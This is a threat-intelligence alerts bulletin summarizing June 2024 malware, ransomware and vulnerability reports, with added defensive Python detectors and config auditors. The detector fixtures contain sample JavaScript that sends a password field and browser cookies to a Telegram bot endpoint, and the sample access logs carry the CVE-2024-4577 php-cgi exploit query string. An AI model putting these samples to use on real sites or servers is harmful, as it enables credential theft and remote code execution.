ALERTS
DATE | NAME | CATEGORY | SUBCATEGORY | INFO

19.6.24 | AzzaSec Ransomware | ALERTS | RANSOM | AzzaSec is another run-of-the-mill ransomware variant distributed in the wild. The malware encrypts user files and appends the .AzzaSec extension to them. The attackers leave a ransom note demanding payment in Bitcoin for file decryption.
19.6.24 | New strain of Diamorphine Linux rootkit | ALERTS | VIRUS | A new variant of Diamorphine, an open-source LKM (Loadable Kernel Module) rootkit, has been found in the wild. Threat actors use the rootkit to hide malicious processes and to elevate privileges on compromised machines. Diamorphine responds to magic packets, allowing the operator to run arbitrary commands on the infected endpoint. This latest variant also adds an exit function that unloads the rootkit kernel module from memory.
19.6.24 | Malvertising Campaign Targets Users With Fake Software Installers | ALERTS | VIRUS | A malvertising campaign has been observed enticing users to download installers masquerading as popular software such as Google Chrome and Microsoft Teams. Users who search for these titles on search engines are directed to typosquatted websites. The installers deploy a backdoor known as Oyster, also referred to as Broomstick, which gathers information about the compromised system, communicates with command-and-control (C2) servers, and enables remote code execution.
19.6.24 | Hijack Loader and Vidar Stealer targeting Cisco Webex users | ALERTS | VIRUS | Malware campaigns affecting users in Latin America and the Asia-Pacific region have recently been reported. The campaigns target users of popular commercial software such as the Cisco Webex Meetings app, enticing them to download password-protected archives containing trojanized copies of the software. Upon extraction and execution, a stealthy loader named Hijack Loader is activated, which in turn deploys Vidar Stealer via an AutoIt script. Vidar Stealer gathers credentials and other sensitive data and exfiltrates them to the attackers' command-and-control (C2) servers. The stealer can also download further payloads such as Amadey Loader, which is used to launch the XMRig miner, and a clipper that redirects cryptocurrency transactions to attacker-controlled wallets.
19.6.24 | Rogue Raticate Malspam Campaign: Malicious PDFs Lead to NetSupport RAT | ALERTS | VIRUS | The cybercriminal group known as Rogue Raticate (aka RATicate) has been active for several years and is well known for targeting enterprises with malicious emails and remote access trojans. This week another of their campaigns was observed. Attached to the emails is a PDF file (e.g., unpaid-7985652547.pdf, Paper-2445311685.pdf) containing a malicious URL. The attackers use two social engineering templates as lures, OneDrive and Adobe. A user who is tricked into clicking the URL is routed through a Traffic Distribution System (TDS) into the rest of the chain, which ends with the NetSupport Remote Access Tool being deployed on their machine.
18.6.24 | Vortax: macOS Malware Campaign Unveiled | ALERTS | VIRUS | A recent malware campaign targeting macOS users to distribute infostealers has surfaced. The threat actor, tracked as markopolo, is actively targeting cryptocurrency users. They use a trojanized build of a virtual meeting application called Vortax which, once downloaded and installed, leads to the deployment of infostealers such as Rhadamanthys, Stealc, and Atomic macOS Stealer.
18.6.24 | Cryptojacking campaign exploiting Docker Engine vulnerabilities | ALERTS | CRYPTOCURRENCY | A new cryptojacking campaign targeting publicly exposed Docker Engine hosts has been observed. It is presumed to be associated with the threat actors behind the previously seen campaign dubbed Spinning YARN. The attack starts by scanning for hosts with the Docker Engine API open on TCP port 2375 and deploying an Alpine Linux container on them.
18.6.24 | Rapax Ransomware | ALERTS | RANSOM | Rapax is a ransomware whose binaries were recently submitted to a public malware analysis and detection platform. The ransom note found on compromised machines (instruction.txt) indicates that the author focuses solely on encrypting files rather than on exfiltration and double extortion, demanding a ransom of 5,000 US dollars in Bitcoin for decryption.
17.6.24 | Limpopo ransomware targets ESXi servers | ALERTS | RANSOM | Limpopo is a new ransomware variant targeting vulnerable ESXi servers, as reported by Fortinet. The variant is believed to be based on the leaked Babuk ransomware source code and related to other strains such as Socotra and Formosa. Limpopo has been distributed in campaigns affecting Latin America and Thailand. The ransomware encrypts user files and appends the .Limpopo extension to them.
17.6.24 | CVE-2024-28995 - SolarWinds Serv-U Directory Traversal vulnerability | ALERTS | VULNERABILITY | CVE-2024-28995 is a recently disclosed directory traversal vulnerability affecting the Serv-U managed file transfer (MFT) server. If successfully exploited, the flaw could allow attackers to read sensitive files on the vulnerable host. While there have been no reports of in-the-wild exploitation at the time of writing, the vendor has addressed the vulnerability in product version 15.4.2 Hotfix 2.
17.6.24 | Brain Cipher Ransomware | ALERTS | RANSOM | Ransomware actors continue to appear left and right, and in this protection bulletin we briefly discuss one that uses a LockBit variant and has recently emerged in the threat landscape. Calling themselves 'Brain Cipher Ransomware' in their ransom note ([randomID].README.txt), this group appears to perform double extortion, exfiltrating sensitive data and encrypting files. Victims are given an encryption ID to use on the group's Onion website to get in touch.
17.6.24 | Chaos ransomware actors pose as Lockbit to add pressure | ALERTS | RANSOM | Symantec has recently observed a Chaos ransomware actor making the rounds, encrypting single machines and claiming to be 'Lockbit' in the dropped ransom notes (readme.txt). In this case, they demand $180 USD worth of Bitcoin to be paid to a specified crypto wallet.
17.6.24 | DISGOMOJI: Discord-based malware campaign targeting government organizations | ALERTS | VIRUS | A novel malware campaign has emerged that uses Discord for command and control (C2) and employs an emoji-based protocol: the threat actor issues commands to the malware by posting emojis in the command channel. Dubbed DISGOMOJI, the malware is a UPX-packed ELF binary written in Go. It contains hardcoded authentication tokens and server IDs, enabling access to the attacker's Discord server.
14.6.24 | OPIX Ransomware | ALERTS | RANSOM | OPIX is a newly discovered ransomware variant typically spread through social engineering tactics such as phishing emails and drive-by downloads. The malware encrypts user files, renames them to a random character string and appends a ".OPIX" extension; for example, a file called "test.txt" becomes something like "B532D3Q9.OPIX". Victims find a ransom note, usually named "#OPIX-Help.txt", instructing them to contact the attackers via the provided email or Telegram handle within 48 hours, otherwise their stolen data will be sold to competitors and published on the dark web.
14.6.24 | Malspam Campaign Delivering Koi Loader/Koi Stealer | ALERTS | VIRUS | In a recent malspam campaign the attackers appear to have altered their tactics to avoid detection. Instead of the typical approach of sending emails with malicious links directly, they begin with benign emails discussing some random scenario. If the recipient responds and engages, the attackers follow up with a malicious link. Clicking it leads to a web page from which a ZIP file containing a Windows shortcut (LNK) file is downloaded. The shortcut then loads the Koi Loader or Koi Stealer payload, which is capable of stealing sensitive data such as cookies, browsing history, and login information.
14.6.24 | El Dorado Ransomware: Increased Attacks | ALERTS | RANSOM | El Dorado is a double-extortion ransomware actor that has recently claimed multiple victims on its leak website. Once they gain access to a company, the attackers search for machines holding valuable data to exfiltrate and encrypt, appending .00000001 to encrypted files. Copies of the ransom note (HOW_RETURN_YOUR_DATA.TXT) are placed in various folders. In the note, they claim to have been "white hat" hackers who turned to crime due to poor pay. They also tell victims how to contact them through the TOR network and via the live chat on their website, threatening to sell or leak the exfiltrated data if the victims do not get in touch within 7 days and pay the ransom. Additionally, they pressure victims with threats of continued attacks against their companies, partners, and customers.
14.6.24 | Operation Celestial Force | ALERTS | OPERATION | A malicious campaign dubbed 'Operation Celestial Force' has been reported by researchers from Cisco Talos. The campaign has been active since at least 2018 and targets Indian organizations in the defense, government and technology sectors. According to the published research, 'Operation Celestial Force' is attributed to the threat group known as Cosmic Leopard. The attackers have been leveraging the Android malware GravityRAT as well as an Electron-based Windows loader called HeavyLift. The attacks are managed through a standalone custom tool called GravityAdmin, which centralizes the execution of malicious actions on compromised systems.
14.6.24 | | ALERTS | VULNERABILITY | As part of June's Patch Tuesday, Microsoft has patched a critical (CVSS score 9.8) Message Queuing (MSMQ) vulnerability, CVE-2024-30080. By sending specially crafted MSMQ packets to a vulnerable server, an attacker might achieve remote code execution and take over the unpatched host. The flaw affects a range of Windows versions, starting from Windows Server 2008 and Windows 10.
14.6.24 | CVE-2024-4701 - Netflix Genie job orchestration engine vulnerability | ALERTS | VULNERABILITY | CVE-2024-4701 is a recently disclosed critical (CVSS score 9.9) path traversal vulnerability affecting Netflix's Genie job orchestration engine for big data applications. If successfully exploited, the vulnerability might allow remote attackers to execute arbitrary code within the vulnerable application and to expose sensitive information. The vulnerability has been patched in Genie OSS version 4.3.18.
14.6.24 | CVE-2024-2194 - WP Statistics Plugin XSS vulnerability | ALERTS | VULNERABILITY | CVE-2024-2194 is a recently disclosed stored cross-site scripting vulnerability affecting the WP Statistics plugin for WordPress in versions up to and including 14.5. If successfully exploited, the vulnerability allows unauthenticated attackers to inject arbitrary web scripts into pages; those scripts then execute whenever a user accesses an injected page. The vulnerability has been reported as being actively exploited in the wild.
13.6.24 | Noodle RAT malware supports both Windows and Linux deployments | ALERTS | VIRUS | Noodle RAT is a malware variant recently identified by researchers from Trend Micro and reported as being used in targeted campaigns in the Asia-Pacific region. Noodle RAT is modular malware with relatively straightforward capabilities and shows several code overlaps with the Gh0st RAT and Rekoobe families. It allows the attackers to download and upload arbitrary files, execute modules in memory, and proxy TCP connections. The threat actors behind Noodle RAT have also been using the MultiDrop and MicroLoad malware prior to deploying the final payload. Next to the Windows variant, a Linux strain has also been identified, with capabilities to download and upload arbitrary files, spawn a reverse shell, and provide SOCKS tunneling.
13.6.24 | Adwind (aka jRAT) distributed in recent campaigns targeting users in Italy | ALERTS | VIRUS | Adwind malware (also known as jRAT) has been observed in recent campaigns targeting users in Italy. The attack chain starts with malspam emails carrying .zip attachments. Upon extraction the user is presented with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files. The final payload is the Adwind Remote Access Trojan (RAT), which gives the attackers control over the compromised endpoint as well as the ability to collect and exfiltrate confidential data.
13.6.24 | WarmCookie backdoor | ALERTS | VIRUS | WarmCookie is a new backdoor distributed in phishing campaigns advertising fake job offers. The attack chain uses malicious JavaScript that runs PowerShell commands, which in turn download the WarmCookie DLL payload. The attackers abuse the Background Intelligent Transfer Service (BITS) to fetch the payloads. WarmCookie has extensive capabilities including endpoint fingerprinting, screenshot capture, arbitrary command execution, reading and exfiltrating file contents, and deploying additional payloads.
13.6.24 | Black Basta attackers leveraging CVE-2024-26169 vulnerability as a zero-day | ALERTS | VIRUS | In a newly released report, Symantec's Threat Hunter Team reviewed evidence suggesting that attackers linked to Black Basta ransomware compiled an exploit for CVE-2024-26169 before the vulnerability was patched. CVE-2024-26169 is a flaw in the Windows Error Reporting Service that allows an attacker to elevate privileges. Analysis indicates that an exploit tool deployed in recent attacks linked to Black Basta has been using this vulnerability as a zero-day.
13.6.24 | Malware campaign unveils new ValleyRAT variant | ALERTS | VIRUS | A malware campaign has been observed delivering a newer version of ValleyRAT as the final payload. The attack involves a downloader with injected shellcode that dynamically resolves APIs and connects to the C2 server to download the next-stage malware, giving remote attackers unauthorized access to and control over infected machines. The new ValleyRAT variant has capabilities such as capturing screenshots, filtering processes, forcing shutdowns, and clearing Windows event logs.
12.6.24 | Remcos RAT delivered via UUEncoding (UUE) file | ALERTS | VIRUS | A recent phishing campaign spreading Remcos RAT uses documents themed around shipping or quotations. The attack starts with a UUE-encoded VBS script which, once decoded, leads to another obfuscated VBS script. That script saves and executes a PowerShell script, which in turn downloads a further obfuscated PowerShell script. The purpose of this chain of obfuscated stages is to evade detection.
12.6.24 | Protection Highlight: Phishers Ramp Up Exploitation of Telegram Bot API | ALERTS | PHISHING | Over the past few months, more and more phishing actors using malicious HTML files have been following in the footsteps of infostealers and RATs and are now also abusing the Telegram Bot API to harvest users' credentials and other sensitive information such as credit card details. This activity is being observed worldwide and can cause significant financial losses, operational disruptions, and reputational damage for enterprises. Attackers use the stolen credentials for account takeover, identity and financial theft, and follow-on attacks, and often sell the stolen data on the dark web.
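As an added example that is not part of the original bulletin, the Python snippet below scans an HTML attachment for Telegram Bot API endpoints of the kind these phishing kits use for exfiltration. It matches the `api.telegram.org/bot<id>:<secret>/<method>` URL shape (a bot token is a numeric bot ID, a colon and a 35-character secret), also decodes `atob("...")` arguments because kits commonly hide the endpoint in base64, and pulls out the `chat_id` the data is sent to. The HTML samples, the bot IDs and the token secrets are constructed for the example, and the helper names are my own.

```python
import base64
import re

# Telegram bot tokens are "<numeric bot id>:<35-char secret>"; kits call
# https://api.telegram.org/bot<token>/<method> (sendMessage, sendDocument, ...)
TELEGRAM_RE = re.compile(
    r"api\.telegram\.org/bot(?P<bot_id>\d{6,12}):(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)"
)
CHAT_ID_RE = re.compile(r"chat_id\W{0,3}(-?\d{5,16})")
# atob("....") arguments; kits frequently hide the endpoint this way
ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)""")


def decode_atob_layers(text: str):
    """Yield ("atob", decoded_text) for every atob() argument that is valid base64."""
    for blob in ATOB_RE.findall(text):
        try:
            raw = base64.b64decode("".join(blob.split()), validate=True)
        except ValueError:            # binascii.Error is a ValueError subclass
            continue
        yield "atob", raw.decode("utf-8", "replace")


def find_telegram_exfil(html: str):
    """Return findings {bot_id, method, chat_id, via} for Telegram Bot API use in HTML/JS."""
    layers = [("plain", html)] + list(decode_atob_layers(html))
    all_text = "\n".join(t for _, t in layers)
    chat = CHAT_ID_RE.search(all_text)
    chat_id = chat.group(1) if chat else None
    findings = []
    for via, text in layers:
        for m in TELEGRAM_RE.finditer(text):
            findings.append({"bot_id": m["bot_id"], "method": m["method"],
                             "chat_id": chat_id, "via": via})
    return findings


# --- constructed samples (not real kits, bot IDs or tokens) -----------------------
DEMO_URL = "https://api.telegram.org/bot123456789:AAExampleSecretTokenForDemoOnly0001/sendMessage"
SAMPLE_HTML_B64 = """<html><body>
<form id="login"><input name="email"><input name="password" type="password"></form>
<script>
var ep = atob("%s");
fetch(ep, {method: "POST",
  body: JSON.stringify({chat_id: "-1001234567890", text: document.forms[0].password.value})});
</script></body></html>""" % base64.b64encode(DEMO_URL.encode()).decode()

SAMPLE_HTML_PLAIN = """<script>
new Image().src = "https://api.telegram.org/bot987654321:AAExampleSecretTokenForDemoOnly0002/sendMessage?chat_id=555444333&text=" + encodeURIComponent(document.cookie);
</script>"""

if __name__ == "__main__":
    for sample in (SAMPLE_HTML_B64, SAMPLE_HTML_PLAIN):
        print(find_telegram_exfil(sample))
```

The same regular expressions work on strings dumped from a binary, so the check is equally useful for triaging infostealer or ransomware samples that talk to Telegram. A recovered bot token is also the thing to report to Telegram, since revoking it cuts off the kit's collection channel.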
12.6.24 | TellYouThePass ransomware exploiting CVE-2024-4577 Argument Injection Vulnerability in PHP | ALERTS | VULNERABILITY | CVE-2024-4577 is a critical (CVSS 9.8) argument injection vulnerability in PHP, the widely used scripting language. The flaw affects PHP running in CGI mode on Windows. Successful exploitation allows an unauthenticated attacker to execute arbitrary code on the vulnerable PHP server, leading to complete system compromise and the delivery of malware, including ransomware.
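The publicly documented exploitation pattern for CVE-2024-4577 relies on Windows best-fit character mapping: in affected locales php-cgi converts the soft hyphen byte 0xAD into an ASCII hyphen, so a query string such as `?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input` becomes `-d allow_url_include=1 -d auto_prepend_file=php://input` on the php-cgi command line, which is the old CVE-2012-1823 argument injection resurfacing. The detector below is added here as an example and is not taken from the bulletin or from any vendor signature: it percent-decodes the query string to bytes and flags 0xAD immediately followed by a php-cgi option letter, plus the plain `-d` form when it carries an ini directive typical of exploitation. The access log lines and addresses are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# php-cgi command-line options an injected argument would select ("-d" sets an ini value)
PHP_CGI_OPTS = rb"dsncq"
# ini directives the public exploit sets so that php://input is executed as code
EXPLOIT_INI = (b"auto_prepend_file", b"allow_url_include", b"auto_append_file")

# 0xAD (soft hyphen) followed by an option letter: best-fit mapping turns it into "-d" etc.
SOFT_HYPHEN_OPT = re.compile(rb"\xad[" + PHP_CGI_OPTS + rb"]")
# the original CVE-2012-1823 form, which a patched server rejects but is still worth logging
PLAIN_OPT = re.compile(rb"(?:^|\s)-[" + PHP_CGI_OPTS + rb"]")

# Common/combined log format; only the fields used here are captured
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def query_bytes(target: str) -> bytes:
    """Percent-decode the query string of a request target to raw bytes ('+' is a space in CGI)."""
    _, _, query = target.partition("?")
    return unquote_to_bytes(query.replace("+", " "))


def is_php_cgi_arg_injection(target: str) -> bool:
    """True if the query string would be parsed by php-cgi as command-line options."""
    q = query_bytes(target)
    if SOFT_HYPHEN_OPT.search(q):
        return True
    return bool(PLAIN_OPT.search(q)) and any(k in q for k in EXPLOIT_INI)


def scan_access_log(lines):
    """Return (ip, target, status) for every request that looks like a CVE-2024-4577 attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_php_cgi_arg_injection(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits


# Constructed access log lines (RFC 5737 documentation addresses), not a real capture
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jun/2024:10:01:02 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512',
    '198.51.100.9 - - [12/Jun/2024:10:01:05 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
    '203.0.113.7 - - [12/Jun/2024:10:02:11 +0000] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 0',
    '192.0.2.5 - - [12/Jun/2024:10:03:00 +0000] "GET /search.php?q=price-drop HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("possible CVE-2024-4577 probe:", hit)
```

A 200 response to the soft-hyphen request on a Windows PHP-CGI host is the line to escalate; the 403 shows the older plain `-d` form being rejected. Patching PHP (or switching the Windows host from php-cgi to FastCGI through PHP-FPM or mod_php) removes the underlying condition; the log check only tells you whether anyone tried.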
12.6.24 | Fog Ransomware | ALERTS | RANSOM | A new ransomware variant dubbed Fog has recently been distributed in the wild. The attackers behind it have been using compromised VPN credentials to attack the networks of US organizations in the education and recreation sectors.
12.6.24 | AZStealer - a Python-based infostealer | ALERTS | VIRUS | AZStealer is a recently discovered Python-based infostealer. It can steal a wide variety of information from compromised endpoints, including data stored in browsers (cookies, history, bookmarks, passwords, saved credit card details and autofill data), Discord tokens, and login sessions from assorted applications including Steam, Uplay, TikTok, Telegram, Twitch, Spotify, Reddit and Roblox.
12.6.24 | Fireant APT targets Vietnamese entities with LNK file malware campaign | ALERTS | APT | A malware campaign by the Fireant (also known as Mustang Panda) APT group using Windows shortcut (LNK) files has been reported. The threat actor targets Vietnamese entities with lures related to the education sector and tax compliance. The attack involves phishing emails with archive (zip, rar) attachments containing malicious LNK files. The final payload is believed to be the PlugX RAT, which lets the attackers remotely execute commands on the compromised system.
12.6.24 | Beware of malicious Python packages on PyPI repository | ALERTS | VIRUS | Numerous malicious Python packages have been observed on the Python Package Index (PyPI), using typosquatting to target users of legitimate packages. For instance, the package 'crytic-compilers' masquerades as the legitimate library 'crytic-compile' and is designed to distribute the Lumma stealer. Similarly, the malicious PyPI package 'pytoileur' downloads and installs trojanized Windows binaries for purposes such as surveillance, persistence, and cryptocurrency theft.
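One practical defense is to compare every name in a requirements file against an allow-list of packages the project really uses, and flag names that are close to, but not equal to, a trusted name. The Python example below is added here and is not code from the bulletin or from PyPI: it applies PEP 503 name normalization and a `difflib` similarity threshold. The allow-list and the requirements file are constructed samples; the `crytic-compilers` entry mirrors the case described above.

```python
import difflib
import re

# Constructed allow-list: packages the project is known to depend on. In practice
# build it from a reviewed lock file or an internal index.
TRUSTED_PACKAGES = {"crytic-compile", "requests", "pillow", "urllib3", "numpy", "cryptography"}


def normalize(name: str) -> str:
    """PEP 503 normalization: lowercase and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text: str):
    """Extract bare project names from requirements.txt content (specifiers, markers and comments dropped)."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):        # skip blanks and options such as -r / -e
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if m:
            names.append(m.group(0))
    return names


def suspicious_packages(requested, trusted=TRUSTED_PACKAGES, cutoff=0.8):
    """Return (requested_name, trusted_lookalike) for names near, but not equal to, a trusted name.

    difflib's ratio is 2*matches/total_length; 0.8 catches one- or two-character edits
    on typical package names without flagging genuinely different ones.
    """
    trusted_norm = sorted(normalize(t) for t in trusted)
    findings = []
    for req in requested:
        n = normalize(req)
        if n in trusted_norm:
            continue
        close = difflib.get_close_matches(n, trusted_norm, n=1, cutoff=cutoff)
        if close:
            findings.append((req, close[0]))
    return findings


# Constructed requirements file for the example
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
crytic-compilers>=0.3   # one character away from crytic-compile
pilow
numpy>=1.26
colorama
"""

if __name__ == "__main__":
    for bad, good in suspicious_packages(parse_requirements(SAMPLE_REQUIREMENTS)):
        print(f"{bad!r} looks like a typosquat of {good!r}")
```

The check is a gate, not a verdict: a flagged name may be a legitimate fork, so the finding should block the install until someone confirms the package against its project page. Running it in CI before `pip install` catches the mistake before any `setup.py` or post-install hook executes.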
12.6.24 | DERO cryptojacking operation targeting Kubernetes infrastructure | ALERTS | CRYPTOCURRENCY | Dero is a cryptocurrency that claims better privacy, anonymity and faster rewards than Monero, and according to a March 2023 report it is often used in cryptojacking. A recent report from a threat researcher discusses the evolution of this cryptojacking campaign, in which the attackers exploit an externally accessible Kubernetes API server with anonymous authentication enabled. After gaining access, the attacker deploys cryptominer workloads across various Kubernetes namespaces under benign-looking names to evade detection.
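This entry and the Docker Engine entry above (18.6.24) start from the same misconfiguration: a container management API reachable from the Internet without authentication. The Python example below, added here and not part of the bulletin, audits the two configuration points involved: a Docker `daemon.json` whose `hosts` list contains a `tcp://` listener without `tlsverify`, and a kube-apiserver command line whose `--anonymous-auth` flag is `true` or absent (the default is `true`) or whose `--authorization-mode` is left at its `AlwaysAllow` default. The weak and fixed configurations are constructed samples.

```python
import json


def docker_daemon_findings(daemon_json: str):
    """Flag Engine API TCP listeners that lack TLS client auth in a Docker daemon.json."""
    cfg = json.loads(daemon_json)
    findings = []
    tls_verify = bool(cfg.get("tlsverify", False))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue                              # unix:// and fd:// sockets are local-only
        bind = host[len("tcp://"):]
        if not tls_verify:
            findings.append(f"docker: {host} serves the Engine API with no authentication")
        elif bind.startswith(("0.0.0.0", "[::]", ":")):
            findings.append(f"docker: {host} listens on all interfaces; restrict it at the firewall too")
    return findings


def kube_apiserver_findings(command):
    """Flag anonymous access on a kube-apiserver command line (e.g. from a static pod manifest)."""
    flags = {}
    for arg in command[1:]:
        if arg.startswith("--"):
            key, _, value = arg[2:].partition("=")
            flags[key] = value or "true"          # a bare boolean flag means true
    findings = []
    # kube-apiserver defaults: --anonymous-auth=true, --authorization-mode=AlwaysAllow
    if flags.get("anonymous-auth", "true").lower() == "true":
        findings.append("kube-apiserver: anonymous authentication is on; unauthenticated "
                        "callers reach the API as system:anonymous")
    if flags.get("authorization-mode", "AlwaysAllow") == "AlwaysAllow":
        findings.append("kube-apiserver: authorization-mode is AlwaysAllow; every "
                        "authenticated (or anonymous) request is permitted")
    return findings


# Constructed configurations: the weak ones reproduce the exposures described in the
# two entries, the fixed ones show the same settings done properly.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
FIXED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})
WEAK_APISERVER_CMD = ["kube-apiserver", "--secure-port=6443"]          # relies on the defaults
FIXED_APISERVER_CMD = ["kube-apiserver", "--secure-port=6443",
                       "--anonymous-auth=false", "--authorization-mode=Node,RBAC"]

if __name__ == "__main__":
    for label, findings in [("weak docker", docker_daemon_findings(WEAK_DAEMON_JSON)),
                            ("fixed docker", docker_daemon_findings(FIXED_DAEMON_JSON)),
                            ("weak apiserver", kube_apiserver_findings(WEAK_APISERVER_CMD)),
                            ("fixed apiserver", kube_apiserver_findings(FIXED_APISERVER_CMD))]:
        print(label, "->", findings or "no findings")
```

Under RBAC, anonymous authentication only becomes exploitable when some binding grants rights to `system:anonymous` or `system:unauthenticated`, so the apiserver finding is a prompt to review those bindings rather than proof of exposure; the Docker finding, by contrast, is a direct root-equivalent exposure of the host, which is exactly what the port 2375 scanning in the Docker entry looks for.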
11.6.24 | SSLoader malware using PhantomLoader | ALERTS | VIRUS | SSLoader malware is being deployed by PhantomLoader, a loader that enhances its evasive and stealthy behavior. The malware arrives via phishing email campaigns, performs reconnaissance while evading detection, exfiltrates data back to the threat actors, and delivers further payloads through various techniques.
11.6.24 | Yet another JScript RAT spreads via phishing campaign | ALERTS | VIRUS | JScript-based RATs are commonly spread via phishing campaigns, and a recent attack was spotted using the same technique as earlier runs: an initial loader script connects to a C&C server, which sends a new malicious script known as the second-stage loader. That loader then fetches the JScript RAT component from the server, enabling persistent operation and execution of commands received from the server.
11.6.24 | Abusing Google Ads to distribute backdoor malware masquerading as Advanced IP Scanner | ALERTS | VIRUS | A backdoor masquerading as Advanced IP Scanner has been observed in the wild. Advanced IP Scanner is a free network scanner for Windows, primarily used by IT administrators to analyze local area networks (LANs) and gather information about connected devices. Over the past year the tool has been repeatedly impersonated: threat actors mimic the legitimate website and abuse Google Ads to ensure their malicious site ranks highly in search results. The fake installer is used to deploy and load a Cobalt Strike beacon.
11.6.24 | New Grandoreiro banking trojan campaign masquerading as government entities through spear-phishing | ALERTS | VIRUS | A new campaign involving the Grandoreiro banking trojan has been observed in the wild. The threat actors use spear-phishing emails masquerading as correspondence from government entities to lure recipients into downloading malware-laden ZIP files. Grandoreiro is a sophisticated and adaptable Windows banking trojan first observed in 2016. It can hijack browser sessions, discover email accounts, steal credentials from web browsers, collect details of the operating system and installed software, and exfiltrate the collected data to its C2 server.
11.6.24 | Agent Tesla sending malicious XLA files | ALERTS | VIRUS | Agent Tesla, a .NET-based infostealing RAT, has recently been distributed via Spanish-language malspam with attached XLA files. These files exploit two old Office vulnerabilities (CVE-2017-11882 and CVE-2017-0199), causing Excel to automatically download and open remotely hosted malicious RTF and JS files, which eventually leads to an Agent Tesla infection.
10.6.24 | Fake 'KMSPico Activator Tool' Utilized to Deliver Vidar InfoStealer | ALERTS | GROUP | Researchers recently identified another drive-by download campaign in which users are deceived into downloading a malware-laden application named 'KMSPico activator tool'. The tool is marketed as a "universal activator" for Windows but is no longer maintained. The attack uses Java dependencies and a malicious AutoIt script to disable Windows Defender, ultimately decrypting the Vidar payload via shellcode. Vidar's primary function is to steal sensitive user data from browsers and digital wallets, but the infostealer can also act as a downloader for ransomware.
8.6.24 | Sticky Werewolf APT | ALERTS | APT | Sticky Werewolf is a threat group first identified over a year ago. The attackers have targeted various organizations, most recently in the pharmaceutical and aviation sectors. In their attacks the threat actors use malicious .lnk files disguised as .docx documents, decoy .pdf files, and malicious Batch and AutoIt scripts, among other techniques. The final payloads distributed in Sticky Werewolf campaigns include various RATs and infostealers; examples of malware families spread in previous attacks are Rhadamanthys Stealer, Ozone RAT, MetaStealer, DarkTrack and NetWire.
8.6.24 | Seidr Stealer | ALERTS | VIRUS | Seidr is another recent infostealer found in the wild and sold via illicit marketplaces. The malware is written in C++ with a modular architecture. Seidr steals a range of information from compromised endpoints, including OS details, browser data, keystrokes captured by its keylogger, and cryptocurrency wallets. It uses Telegram both for data exfiltration and for command and control (C2).
8.6.24 | DORRA Ransomware | ALERTS | RANSOM | DORRA is a recently found ransomware variant from the Makop malware family. The malware encrypts user files, appending a unique ID, the developer's email address and the ".DORRA" extension to them. The ransomware drops a ransom note as a text file called "README-WARNING.txt", in which victims are asked to contact the attackers via the provided email for further instructions on data decryption.
8.6.24 | Apache RocketMQ targeted in Muhstik botnet campaign | ALERTS | BOTNET | A recent campaign targeting Apache RocketMQ platforms, exploiting a known remote code execution vulnerability (CVE-2023-33246), has been observed. As part of the campaign the threat actors deploy the Muhstik botnet, known for distributed denial-of-service (DDoS) attacks. Muhstik establishes persistence, evades detection, performs lateral movement, and communicates through an IRC command-and-control server. The malware can be used for cryptocurrency mining as well as for launching DDoS attacks.
8.6.24 | Enhanced version of Vidar Stealer emerges | ALERTS | VIRUS | An updated version of Vidar Stealer has been observed in the wild. This customizable malware is sold on the dark web and via Telegram channels as malware-as-a-service, uses social media platforms as part of its command-and-control infrastructure, and is deployed alongside other malware such as STOP/Djvu ransomware and the SmokeLoader backdoor. Written in C++, the malware targets victims' personal information, web browser data, cryptocurrency wallets, financial information, communication applications, and more. It evades detection and exfiltrates the stolen data from compromised systems to its C2 servers.
8.6.24 | CashRansomware - a new arrival to the threat landscape | ALERTS | RANSOM | CashRansomware (aka CashCrypt) is a newly identified Ransomware-as-a-Service (RaaS) variant. As reported by researchers from Tehtris, the malware appears to still be in active development. CashRansomware is written in C# and uses timing checks to detect execution inside a sandbox or virtualized environment. It can communicate with the attackers via the Telegram API. CashRansomware encrypts user files, appending the '.CashRansomware' extension to them, and can also delete system restore points from the infected endpoint.
8.6.24 | UNC1151 APT targets the Ukrainian Ministry of Defence with malicious Excel campaign | ALERTS | APT | The UNC1151 APT group, known for targeting Eastern European countries, has been observed conducting a malware campaign against the Ukrainian Ministry of Defence using a malicious Excel document as a lure. When opened, the document runs an embedded VBA macro that drops an LNK file and a DLL loader. Running the LNK file launches the DLL loader, which is suspected to lead to final payloads such as Agent Tesla, Cobalt Strike beacons, and njRAT.

6.6.24 | CVE-2024-32113 - Path Traversal vulnerability in Apache OFBiz | ALERTS | VULNERABILITY | CVE-2024-32113 is a recently disclosed path traversal vulnerability affecting Apache OFBiz, an open source enterprise resource planning (ERP) system. If successfully exploited, the vulnerability might lead to remote code execution in the context of the affected service account. The vulnerability has been fixed in Apache OFBiz version 18.12.13; users should upgrade to that version or later.
